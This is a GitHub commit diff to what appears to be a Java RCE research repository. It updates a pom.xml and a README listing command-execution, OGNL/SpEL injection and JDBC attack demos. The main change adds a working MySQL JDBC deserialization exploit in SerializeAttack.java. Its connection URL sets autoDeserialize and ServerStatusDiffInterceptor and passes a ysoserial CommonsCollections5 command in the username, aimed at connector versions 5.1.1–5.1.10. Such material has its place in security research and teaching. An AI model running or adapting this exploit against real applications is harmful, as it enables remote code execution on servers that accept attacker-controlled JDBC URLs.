Skip to content

Commit cba2dbb

Browse files
WhoopsunixWhoopsunix
committed
update JDBC Attack mysql :)
1 parent d948629 commit cba2dbb

3 files changed

Lines changed: 54 additions & 16 deletions

File tree

JDBCAttack/pom.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
<groupId>mysql</groupId>
1919
<artifactId>mysql-connector-java</artifactId>
2020
<!-- <version>3.1.11</version>-->
21-
<!-- <version>5.1.19</version>-->
21+
<!-- <version>5.1.29</version>-->
2222
<!-- <version>6.0.6</version>-->
2323
<version>8.0.19</version>
2424
</dependency>

JDBCAttack/src/main/java/org/example/mysql/SerializeAttack.java

Lines changed: 18 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,8 @@
22

33
import java.sql.Connection;
44
import java.sql.DriverManager;
5+
import java.sql.PreparedStatement;
6+
import java.sql.ResultSet;
57

68
/**
79
* 反序列化
@@ -12,6 +14,21 @@
1214
*/
1315
public class SerializeAttack {
1416
public static void main(String[] args) throws Exception {
17+
/**
18+
* [5.1.1, 5.1.10]
19+
* 使用 statementInterceptors 参数
20+
* 需要通过 查询调用
21+
*/
22+
String serializeAttackUrl_5_1_10 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
23+
String username = "yso_CommonsCollections5_open -a Calculator.app";
24+
String password = "";
25+
Class.forName("com.mysql.jdbc.Driver");
26+
Connection con = DriverManager.getConnection(serializeAttackUrl_5_1_10, username, password);
27+
String sql = "select database()";
28+
PreparedStatement ps = con.prepareStatement(sql);
29+
ResultSet resultSet = ps.executeQuery();
30+
31+
1532
/**
1633
* [5.1.11, 5.1.48]
1734
* 使用 statementInterceptors 参数
@@ -46,9 +63,7 @@ public static void main(String[] args) throws Exception {
4663
// String driver = "com.mysql.jdbc.Driver";
4764
// Class.forName(driver);
4865

49-
50-
Connection connection = DriverManager.getConnection(serializeAttackUrl_8_7_19);
51-
66+
Connection connection = DriverManager.getConnection(serializeAttackUrl_5_29_40);
5267

5368
}
5469

README.md

Lines changed: 35 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -4,13 +4,29 @@ By. Whoopsunix
44

55
# 0x00 do what?
66

7-
Java 能获取到权限的 Demo,目前涵盖命令执行、表达式、内存马、JDBC、反序列化、工具类
7+
对照实战场景梳理 Java Rce 相关漏洞进一步利用方式
88

9-
# 命令执行
9+
## 目录
1010

11-
参考 [javaweb-sec](https://github.com/javaweb-sec/javaweb-sec) 很详细
11+
- [命令执行](#0x01-command)
12+
- [执行Demo](#执行demo)
13+
- [执行结果输出(InputStream 处理Demo)](#执行结果输出(InputStream 处理Demo))
14+
- [表达式注入](#0x02-expression-inject)
15+
- [OGNL](#ognl)
16+
- get、set执行,sout输出时的回显
17+
- [SPEL](#spel)
18+
- [JDBC Attack](#0x03-jdbc-attack)
19+
- mysql
1220

13-
## 执行方式
21+
目前涵盖:命令执行及输出、表达式及输出、内存马、JDBC、反序列化、工具类
22+
23+
# 0x01 Command
24+
25+
参考 [javaweb-sec](https://github.com/javaweb-sec/javaweb-sec) 有很详细的例子
26+
27+
[命令执行 Demo](Command)
28+
29+
## 执行Demo
1430

1531
- [x] Runtime
1632
- [x] ProcessBuilder
@@ -31,21 +47,28 @@ Java 能获取到权限的 Demo,目前涵盖命令执行、表达式、内存
3147
- [x] org.springframework:spring-core
3248
- [x] org.apache.commons:commons-io
3349

34-
# 表达式注入
50+
# 0x02 expression inject
3551

36-
## OGNL
52+
[表达式注入 Demo](Expression)
3753

38-
## SPEL
54+
## OGNL
3955

56+
- [x] 普通执行demo:get、set
57+
- [x] 有sout的回显 (Ps. 通过 Servlet 的回显移到 RceEcho 章节介绍)
58+
- 原生
59+
- base64加密
4060

61+
# 0x03 JDBC Attack
4162

42-
# JDBC相关
63+
## [mysql](JDBCAttack)
4364

44-
# 内存马
65+
- [x] 文件读取
66+
- [x] 反序列化
4567

46-
# 参考
68+
# 感谢师傅们的研究 带来了很大的帮助 :)
4769

4870
> https://github.com/javaweb-sec/javaweb-sec
49-
>
71+
>
5072
> https://github.com/yzddmr6/Java-Js-Engine-Payloads
51-
>
73+
>
74+
> https://github.com/su18/JDBC-Attack

0 commit comments

Comments
 (0)